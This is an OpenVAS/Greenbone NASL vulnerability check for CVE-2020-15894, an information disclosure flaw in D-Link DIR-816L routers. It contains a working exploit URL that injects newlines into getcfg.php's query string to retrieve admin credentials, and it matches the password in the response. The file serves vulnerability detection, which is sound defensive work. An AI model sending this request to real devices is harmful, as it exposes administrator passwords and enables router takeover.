D-Link DIR-816L Information Disclosure Vulnerability (CVE-2020-15894)

# SPDX-FileCopyrightText: 2020 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-or-later

CPE_PREFIX = "cpe:/o:dlink";

if (description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.144342");
  script_version("2023-11-21T05:05:52+0000");
  script_tag(name:"last_modification", value:"2023-11-21 05:05:52 +0000 (Tue, 21 Nov 2023)");
  script_tag(name:"creation_date", value:"2020-08-03 09:07:05 +0000 (Mon, 03 Aug 2020)");
  script_tag(name:"cvss_base", value:"5.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:N/A:N");
  script_tag(name:"severity_vector", value:"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N");
  script_tag(name:"severity_origin", value:"NVD");
  script_tag(name:"severity_date", value:"2020-07-24 19:13:00 +0000 (Fri, 24 Jul 2020)");

  script_cve_id("CVE-2020-15894");

  script_tag(name:"qod_type", value:"exploit");

  script_tag(name:"solution_type", value:"VendorFix");

  script_name("D-Link DIR-816L Information Disclosure Vulnerability (CVE-2020-15894)");

  script_category(ACT_ATTACK);

  script_copyright("Copyright (C) 2020 Greenbone AG");
  script_family("Web application abuses");
  script_dependencies("gb_dlink_dns_http_detect.nasl", "gb_dlink_dsl_detect.nasl",
                      "gb_dlink_dap_consolidation.nasl", "gb_dlink_dir_consolidation.nasl",
                      "gb_dlink_dwr_detect.nasl");
  script_mandatory_keys("d-link/http/detected"); # nb: Experiences in the past have shown that various different devices might be affected
  script_require_ports("Services/www", 80);

  script_tag(name:"summary", value:"The D-Link DIR-816L is prone to an information disclosure
  vulnerability.");

  script_tag(name:"insight", value:"There exists an exposed administration function in getcfg.php,
  which can be used to call various services. It can be utilized by an attacker to retrieve various
  sensitive information, such as admin login credentials, by setting the value of _POST_SERVICES in
  the query string to DEVICE.ACCOUNT.");

  script_tag(name:"vuldetect", value:"Sends a crafted HTTP GET request and checks the response.");

  script_tag(name:"affected", value:"D-Link DIR-816L devices. Other D-Link products might be affected
  as well.");

  script_tag(name:"solution", value:"See the referenced vendor advisory for a solution.");

  script_xref(name:"URL", value:"https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10169");
  script_xref(name:"URL", value:"https://research.loginsoft.com/vulnerability/multiple-vulnerabilities-discovered-in-the-d-link-firmware-dir-816l/");

  exit(0);
}

include("host_details.inc");
include("http_func.inc");
include("http_keepalive.inc");

if (!infos = get_app_port_from_cpe_prefix(cpe: CPE_PREFIX, service: "www"))
  exit(0);

port = infos["port"];
CPE = infos["cpe"];

if (!dir = get_app_location(cpe: CPE, port: port))
  exit(0);

if (dir == "/")
  dir = "";

url = dir + "/getcfg.php?a=%0A_POST_SERVICES%3DDEVICE.ACCOUNT%0AAUTHORIZED_GROUP%3D1";

if (http_vuln_check(port: port, url: url, pattern: "<password>[^<]+</password>", check_header: TRUE,
    extra_check: "<service>DEVICE\.ACCOUNT")) {
  report = http_report_vuln_url(port: port, url: url);
  security_message(port: port, data: report);
  exit(0);
}

exit(99);